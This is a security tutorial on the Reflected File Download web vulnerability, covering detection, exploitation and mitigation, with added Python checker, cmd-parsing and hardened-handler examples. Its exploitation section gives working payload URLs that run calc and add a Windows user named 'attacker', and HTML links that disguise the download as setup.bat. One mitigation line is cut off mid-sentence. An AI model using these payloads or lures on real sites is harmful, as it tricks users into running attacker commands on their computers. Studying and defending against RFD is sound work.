Reflected File Download Vulnerability

Narendra Bhati
@imnarendrabhati
https://websecgeeks.com
narendra.bhati@websecgeeks.com

HTTP/1.1 200 OK
Content-Type: application/json
Content-Disposition: attachment

We will talk about the Reflected File Download (RFD) vulnerability, which is still relatively unknown to most researchers. We will see how to find this vulnerability and then build an actual exploit to demonstrate its impact in a real-world scenario.
Contents:

1. Abstract
2. Introduction
3. Analysis
4. Exploitation
5. Mitigation
1. Abstract

Modern applications are widely used today, mostly as a business requirement. Many of them are built on API calls and JSON-based architectures for better speed and more interactive usability, which improves the user experience.

As the famous line from Spider-Man goes: “With great power comes great responsibility”. The same phrase applies to this topic. Despite efforts to strengthen security, modern web applications still fall victim to many attacks, and they will for many years to come.
2. Introduction About RFD:

Reflected File Download (RFD) is a vulnerability that allows an attacker to trick a user into downloading a malicious file. It was discovered by Oren Hafif, who presented it at Black Hat Europe 2014.

RFD lets an attacker trick the victim into downloading a malicious file or script from a trusted domain. In simple words, the attacker abuses the trust users place in a domain/host to make that site's own visitors download a file which then attacks their systems.

To understand RFD better we will divide the vulnerability into its three parts: Reflected, File and Download.

Let’s start:

A. Reflected:

In the screenshot from the test application, the value of the user-supplied “download” parameter is reflected back in the response as part of a JSON array.
JSON is a format for storing and transporting data. It is often used when data is sent from a server to a web page, and it makes web applications more flexible and faster to load. A typical JSON object looks like this:

{"firstName":"narendra", "lastName":"bhati"}

For RFD to work in the cases covered here, the response should be JSON that reflects our input, as in the example above.

This is the first requirement to look for when approaching a Reflected File Download vulnerability.

Info: the “download” parameter value is reflected back into the HTTP response as part of a JSON array.

This type of input mostly looks like:

http://anysite.com/home/search?givemevalue=iambhati&country=india

Either of these parameters, for example “country”, may be reflected back into the HTTP response as part of the JSON array.
B. File:

This is the most important thing to look for in a Reflected File Download vulnerability.

The application should accept special characters such as semicolons “;”, slashes “/” and question marks “?” in the request. Why this matters is discussed in the analysis part.

C. Download

The response should be served as a download and contain the user input value, as shown below. (I used the Chrome browser.)

Info: the response is downloadable and the input value is also reflected in the downloaded file.
But there is a catch with the downloadable file. After observing this behaviour, first look at the HTTP response for a “Content-Disposition” header.

If this header is present and carries a filename parameter, it instructs the browser to use that name for the downloaded file, which acts as a barrier for us. If it only says “attachment” without a filename, the browser still derives the name from the URL.

Let's move to the analysis part.

3. Analysis:

Finding RFD is a fairly easy task if you approach it in the right way.

RFD mostly shows up in modern web applications: JSON responses, API calls, every endpoint that reflects user input. To find such endpoints, always keep an eye on the proxy history in tools like Burp Suite or OWASP ZAP.

If you have read the introduction carefully, this attack will be easy to understand.

Below is a typical JSON-based application that takes user input from the parameter “download”. The URL is:

http://iamvulnerable.net/home/account/search?download=howareyou
We observe that our input is reflected back in the HTTP response. Great, the first requirement is met.

Our second requirement is that the response is served as a download, and the target application does have that behaviour.

Our input is reflected in the downloadable file, which has no file extension.

Now the tricky part comes into the picture. As the third requirement, the application should allow us to enter special characters such as “;”, “?” and “/”.
We already know that our input is reflected in the downloaded file and that the file has no extension. Now we have to check whether we can control the filename from the URL itself.

Why use “;”, “/” and “?”? When the application does not send a filename in its “Content-Disposition” header, the browser takes the filename from the last segment of the URL path. Appending characters such as “;” lets us attach a name and extension of our choosing to that segment: some server stacks (Java servlet containers are the classic example) treat everything after “;” as a path parameter and still route the request to the original endpoint, while the browser uses the whole segment as the filename.

To test this we perform some blind tries like:

http://iamvulnerable.net/home/account/searchrfdtest.bat?download=howareyou
http://iamvulnerable.net/home/account/search;rfdtest.bat?download=howareyou
http://iamvulnerable.net/home/account/;searchrfdtest.bat?download=howareyou
http://iamvulnerable.net/home/account/;search;rfdtest.bat?download=howareyou
http://iamvulnerable.net/home/account/search;/rfdtest.bat?download=howareyou

To be honest, there is no single way to triage this vulnerability, but you can apply the same approach while varying the vector, because every application behaves differently.

After some tries we found that this payload works:

http://iamvulnerable.net/home/account/searchrfdtest.bat?download=howareyou
The downloaded file is now in “bat” format, as shown below.

Info: the downloaded file is now saved as a “bat” file.

If you open the same file in an editor such as Notepad, you will find the same user input inside the “bat” file.
Finally we have all three requirements:

● We can control the user input.
● We can control the file extension.
● We have a downloadable response.
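The three checks above can be scripted. The following is an added example, not code from the original paper or from any tool it mentions: given a request URL and the response headers and body, it decides which filename the browser would use (a filename in Content-Disposition wins, otherwise the last URL path segment, exactly the rule described in this section) and whether all three RFD requirements hold. The marker value, the sample responses and the hypothetical host iamvulnerable.net are constructed for the example. It also goes one step beyond the text by treating a JSON-escaped quote (\") as a surviving reflection, because cmd.exe does not honour backslash escapes.

```python
import json
import re
from urllib.parse import quote, unquote, urlsplit

# Hypothetical probe value: harmless, but it carries the characters an RFD
# payload needs (a double quote and pipes) so we can see whether they survive.
MARKER = 'rfdtest"||calc||'

# Extensions that Windows or a browser would hand straight to an interpreter.
EXECUTABLE_EXTENSIONS = {"bat", "cmd", "ps1", "vbs", "js", "hta", "exe"}


def browser_filename(url, headers):
    """Name the browser would give the download, following the rule in the text:
    a filename in Content-Disposition wins, otherwise the last URL path segment."""
    lowered = {k.lower(): v for k, v in headers.items()}
    disposition = lowered.get("content-disposition", "")
    match = re.search(r'filename="?([^";]+)"?', disposition, re.IGNORECASE)
    if match:
        return match.group(1).strip()
    segment = urlsplit(url).path.rsplit("/", 1)[-1]
    return unquote(segment) or "download"


def assess_rfd(url, headers, body, marker=MARKER):
    """Check the three RFD requirements (reflected, file, download) for one response."""
    lowered = {k.lower(): v for k, v in headers.items()}
    disposition = lowered.get("content-disposition", "").lower()
    name = browser_filename(url, headers)
    extension = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    # JSON-escaping the quote (\") does not help: cmd.exe has no backslash
    # escape, so the escaped form is counted as a surviving reflection too.
    reflected = marker in body or marker.replace('"', '\\"') in body
    result = {
        "reflected": reflected,
        "downloadable": "attachment" in disposition,
        "filename": name,
        "extension": extension,
        "filename_from_url": "filename=" not in disposition,
    }
    result["vulnerable"] = (
        reflected
        and result["downloadable"]
        and result["filename_from_url"]
        and extension in EXECUTABLE_EXTENSIONS
    )
    return result


# Constructed sample exchanges (not captured traffic); the host and path are the
# hypothetical ones used in this write-up.
TEST_URL = (
    "http://iamvulnerable.net/home/account/searchrfdtest.bat?download="
    + quote(MARKER, safe="")
)
VULNERABLE = (
    {"Content-Type": "application/json", "Content-Disposition": "attachment"},
    '{"owasp":["rfd","' + MARKER + '","demo"]}',
)
ESCAPED_ONLY = (  # quote escaped by a JSON encoder, but still no filename
    {"Content-Type": "application/json", "Content-Disposition": "attachment"},
    json.dumps({"owasp": ["rfd", MARKER, "demo"]}),
)
HARDENED = (  # fixed server-chosen filename, and the input was rejected
    {
        "Content-Type": "application/json",
        "Content-Disposition": 'attachment; filename="search.json"',
        "X-Content-Type-Options": "nosniff",
    },
    '{"error":"query contains unsupported characters"}',
)

if __name__ == "__main__":
    samples = (("vulnerable", VULNERABLE), ("escaped only", ESCAPED_ONLY), ("hardened", HARDENED))
    for label, (headers, body) in samples:
        print(label, assess_rfd(TEST_URL, headers, body))
```

Run against the three constructed responses, the vulnerable and the escaped-only samples both come back vulnerable with filename searchrfdtest.bat, while the hardened sample is named search.json by its header and is not vulnerable. In a real test, feed it the URL you sent from the proxy and the raw response you got back.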
	
	
	
	
4. Exploitation

Whoever knows how to wield a sword can make many kills.

Having met all three requirements, it is time to exploit the vulnerability.

If you look at how a “bat” file behaves, you will realise that any command present in the file is executed directly by the Windows shell (cmd.exe).

For example, a file called “mkdir.bat” containing the line “mkdir tmp” will, whenever it is run, ask the Windows shell to create a new folder called “tmp”.

In the same way, if you look at where our input lands in the downloaded file, you will see that we can inject our own command there.
http://iamvulnerable.net/home/account/searchrfdtest.bat?download="||calc||

Info: we enter “"||calc||” in the download parameter, and that value is saved into the file.

In a Unix shell you can chain two commands on one line, for example “dir; date” runs dir first and then date. The Windows shell uses “&”, “&&” and “||” for the same purpose.

Just like this, we can inject a custom command payload into the user input which acts as a chained command. As you can see below, I used “"||calc||”. The leading double quote closes the quoted string that cmd.exe is still inside, so the syntax breaks there and the double pipes that follow are read as the conditional operator, which instructs the shell as follows:
Invalidcommand || dir

Execute command B if command A failed. So with our payload the file contains:

{"owasp":["rfd",""||calc||","demo"]}

When this bat file is executed, the Windows shell first tries to run {"owasp":["rfd","" which is not a valid command, so it fails; the shell then runs the second command, “calc”, which starts the Calculator program.

Info: the file name is rfd2.bat and the input value is “"||calc||”, saved as a “bat” file.
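To make that parsing rule concrete, here is an added example (not from the original write-up or from any tool it mentions) that models how cmd.exe splits a line on “||”, “&&” and “&” outside double quotes, and which segments would actually run given a hypothetical set of commands that exist on the victim. It also goes beyond the write-up by checking the same payload after a JSON encoder has escaped the quote: cmd.exe has no backslash escape, so the \" sequence still closes the quoted string and the payload still runs. The file contents are constructed from the URLs above, and the model ignores cmd.exe's other features (caret escaping, variable expansion, parentheses, redirection).

```python
# Constructed file contents, built the way this write-up describes: the reflected
# "download" parameter lands inside a JSON array that is saved as a .bat file.
PAGE_PAYLOAD = '{"owasp":["rfd",""||calc||","demo"]}'
ESCAPED_PAYLOAD = '{"owasp":["rfd","\\"||calc||","demo"]}'  # quote JSON-escaped as \"
ACCOUNT_PAYLOAD = '{"owasp":["rfd",""||net user attacker attacker /add||","demo"]}'

# Hypothetical set of command names that exist on the victim machine.
KNOWN_COMMANDS = {"calc", "dir", "date", "net", "mkdir"}


def cmd_segments(line):
    """Split a cmd.exe line on the operators ||, && and & that sit outside double
    quotes. A double quote toggles the quoted state and nothing escapes it.
    Returns a list of (command, operator_before_it) pairs."""
    segments, buf, op_before, in_quote = [], [], None, False
    i = 0
    while i < len(line):
        ch = line[i]
        if ch == '"':
            in_quote = not in_quote
            buf.append(ch)
            i += 1
        elif not in_quote and line.startswith(("||", "&&"), i):
            segments.append(("".join(buf).strip(), op_before))
            buf, op_before = [], line[i:i + 2]
            i += 2
        elif not in_quote and ch == "&":
            segments.append(("".join(buf).strip(), op_before))
            buf, op_before = [], "&"
            i += 1
        else:
            buf.append(ch)
            i += 1
    segments.append(("".join(buf).strip(), op_before))
    return segments


def simulate(line, known=KNOWN_COMMANDS):
    """Return the commands cmd.exe would actually run: a || segment runs only if
    the previous one failed, a && segment only if it succeeded, & runs always.
    A segment succeeds when its first token is a known command name."""
    executed, last_ok = [], True
    for command, op in cmd_segments(line):
        if (op == "||" and last_ok) or (op == "&&" and not last_ok):
            continue
        tokens = command.split()
        last_ok = bool(tokens) and tokens[0] in known
        if last_ok:
            executed.append(command)
    return executed


if __name__ == "__main__":
    for payload in (PAGE_PAYLOAD, ESCAPED_PAYLOAD, ACCOUNT_PAYLOAD):
        print(payload, "->", simulate(payload))
```

For all three constructed files the only command that runs is the one between the pipes: the JSON prefix fails as a command, the payload runs because of “||”, and the trailing JSON is skipped because the payload succeeded. The escaped variant behaving the same way is the reason output encoding alone is not a fix for RFD.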
Info: after executing that file, Calculator is launched.

We have successfully executed Calculator using the Reflected File Download vulnerability.

Now use your imagination as to how this vulnerability could be used to perform malicious tasks on the victim's computer.

For demonstration, we will create an account on the victim's computer. Before that, let's check the victim's user accounts.
Now we create a new payload, just like the calc one:

http://iamvulnerable.net/home/account/searchrfdtest.bat?download="||net user attacker attacker /add||

After this URL is opened, a file is downloaded as “bat”, as shown below.
Info: we use another payload which creates an account with the username “attacker”.

After executing this file, a console window flashes up and disappears. Now let's check the victim's user accounts again.
Oops, we have another user account named “attacker”.

We can make RFD work in other browsers with some modification, using the HTML5 download attribute as shown below.

This code works in Opera and Chrome; after clicking the link, a file is downloaded as setup.bat:

<a href="http://iamvulnerable.net/home/account/searchrfdtest.bat?download=%22||net%20user%20attacker%20attacker%20/add||" download="setup.bat">Download</a>

Due to browser behaviour, some browsers need the download triggered differently; for Firefox the author uses the code below:

<a href="http://iamvulnerable.net/home/account/searchrfdtest.bat?download=%22||net%20user%20attacker%20attacker%20/add||" download="setup.bat" onclick="return false">Download</a>

Two caveats when reproducing this today: current browsers ignore the download attribute on cross-origin links, so the attribute only renames the file when the page hosting the link is same-origin with the vulnerable endpoint, and returning false from onclick cancels the link's default action, so that handler has to start the download by other means.

5. Mitigation

Send a “Content-Disposition: attachment; filename=...” header with a fixed, server-chosen filename, which prevents the attacker from controlling the file extension.

Don't let the application accept permissive input; restrict reflected parameters to the characters they actually need.

Limit the callback function for “;” “
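The first two mitigations applied to the endpoint from this paper, as an added example (not the author's or any project's code): a minimal handler modelled on the vulnerable behaviour described above beside a hardened one. The allowlist pattern and the fixed filename “search.json” are assumptions for the example; a real endpoint would pick the narrowest set of characters its search actually needs. The fixed filename is the control that defeats the URL trick from the analysis section; the allowlist and the nosniff header are defence in depth.

```python
import json
import re

# Allowlist for the reflected "download" parameter (an assumption for this
# example; tighten it to what the real endpoint actually needs).
SAFE_QUERY = re.compile(r"^[A-Za-z0-9 _.-]{1,64}$")


def vulnerable_search(query):
    """Behaviour the write-up describes: input echoed verbatim into a JSON body
    that is served as an attachment without a server-chosen filename, so the
    browser names the file after the URL."""
    headers = {
        "Content-Type": "application/json",
        "Content-Disposition": "attachment",
    }
    body = '{"owasp":["rfd","' + query + '","demo"]}'
    return 200, headers, body


def hardened_search(query):
    """Same endpoint with the mitigations from this section applied."""
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        # Fixed, server-chosen name: the browser no longer derives it from the
        # URL, so the attacker loses control of the extension.
        "Content-Disposition": 'attachment; filename="search.json"',
        # Stops MIME sniffing of the body; defence in depth, not an RFD fix alone.
        "X-Content-Type-Options": "nosniff",
    }
    if not SAFE_QUERY.fullmatch(query):
        # Reject rather than "clean": the shell operators never reach the body.
        return 400, headers, json.dumps({"error": "query contains unsupported characters"})
    return 200, headers, json.dumps({"owasp": ["rfd", query, "demo"]})


def filename_from_header(headers):
    """Filename the Content-Disposition header pins, or None if it sets none."""
    match = re.search(r'filename="?([^";]+)"?', headers.get("Content-Disposition", ""))
    return match.group(1) if match else None


if __name__ == "__main__":
    for handler in (vulnerable_search, hardened_search):
        for query in ("howareyou", '"||calc||'):
            status, headers, body = handler(query)
            print(handler.__name__, query, status, filename_from_header(headers), body)
```

The vulnerable handler returns the calc payload verbatim with no filename pinned; the hardened one answers 400 to the same input and pins search.json for every response, so even a request for /search;rfdtest.bat would be saved under the server's name.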
	
	
Conclusion

After analysing this vulnerability, we can say that there is always a vulnerability or weakness in modern web applications, no matter which platform they are built on. We should look for every possibility of every attack.

Many organisations still think this is not a vulnerability because it affects the user's (victim's) machine rather than the application itself. But on closer inspection, this vulnerability exists because of the vulnerable application, and it affects that application's own users. There is another point to consider: this vulnerability exploits the trust users place in the website they visit most.
Source: https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf

Narendra Bhati
@imnarendrabhati
https://websecgeeks.com
narendra.bhati@websecgeeks.com
